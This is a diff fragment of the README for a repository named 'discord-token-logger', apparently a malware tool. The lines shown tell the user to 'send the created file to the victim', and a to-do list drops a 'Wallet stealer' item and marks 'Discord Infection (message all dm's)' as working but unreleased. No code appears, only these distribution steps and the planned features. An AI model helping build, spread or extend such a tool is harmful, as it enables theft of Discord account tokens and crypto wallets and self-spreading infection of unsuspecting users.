FZKiritsugu/discord-token-logger/README.md

 4. send the created file to the victim!

 ## todo-list:
-- Wallet stealer
-- Discord Infection (message all dm's)
+- Discord Infection (message all dm's) (working, but will release soon!)

 # preview: